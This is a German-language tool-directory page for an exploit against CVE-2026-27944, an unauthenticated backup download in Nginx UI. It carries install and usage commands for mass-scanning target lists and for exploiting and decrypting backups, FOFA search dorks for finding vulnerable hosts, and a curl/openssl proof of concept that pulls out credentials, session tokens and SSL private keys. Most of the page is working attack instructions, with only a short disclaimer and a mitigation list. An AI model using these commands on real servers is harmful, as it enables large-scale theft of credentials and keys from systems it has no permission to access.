Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Cve-2026-27944-Tools-Exploit — Suka suka lah | Kitploit
Tools/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
ReconnaissanceEncryption/Decryption ToolsPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation Gathering
GitHubbimabalance/cve-2026-27944-tools-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Cve-2026-27944-Tools-Exploit

Suka suka lah

Repository anzeigen
1vor 1 MonatNoch nicht geprüft
Teilen

🚀 CVE-2026-27944: Nginx UI Unathenticated Backup Exploit

📌 Beschreibung

27944.py ist ein Exploit-Tool für CVE-2026-27944, das es Angreifern ermöglicht, Backups der Nginx UI ohne Authentifizierung herunterzuladen und zu entschlüsseln.

Die Schwachstelle besteht in Nginx UI Versionen < 2.3.2 und ermöglicht Zugriff auf:

· Benutzeranmeldeinformationen & Sitzungstokens · SSL-Private-Keys · Nginx-Konfiguration · Datenbankdateien

🔧 Funktionen

· ✅ Massenscan aus einer Zieldatei · ✅ Einzelziel-Exploit · ✅ Automatischer Backup-Download · ✅ Automatische AES-256-CBC-Entschlüsselung · ✅ Automatische Extraktion von Anmeldeinformationen aus dem Backup

🛠️ Installation

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 Verwendung

  1. Massenscan
root@kitploit:~
python 27944.py -f targets.txt -o scan_results
  1. Exploit Einzelziel
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. Vollständiger Exploit
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o full_results

📋 Format der Ziele

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 FOFA-Dork

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 Ausgabe

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ Haftungsausschluss

Dieses Tool wurde zu Bildungszwecken und für ethische Sicherheitstests entwickelt. Der Autor übernimmt keine Haftung für Missbrauch dieses Tools. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine schriftliche Genehmigung zum Testen haben.

📝 Technische Erklärung

CVE-2026-27944 ist eine kritische Schwachstelle in Nginx UI, die es Angreifern ermöglicht, auf den Endpunkt /api/backup ohne Authentifizierung zuzugreifen. Das Backup enthält sensible Daten, die mit AES-256 verschlüsselt sind, jedoch werden Schlüssel und IV im HTTP-Header X-Backup-Security im Base64-Format übertragen.

CVSS-Score: 9.8 (Kritisch)

Betroffene Versionen: Nginx UI < 2.3.2

Gegenmaßnahmen:

  1. Upgrade auf Nginx UI v2.3.3
  2. Zugriff auf /api/backup blockieren
  3. Alle Anmeldeinformationen rotieren

💀 POC

root@kitploit:~
# Schwachstelle prüfen
curl -I http://target:9000/api/backup

# Backup herunterladen
curl -s http://target:9000/api/backup -o backup.bin

# Backup manuell entschlüsseln
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
Tool herunterladen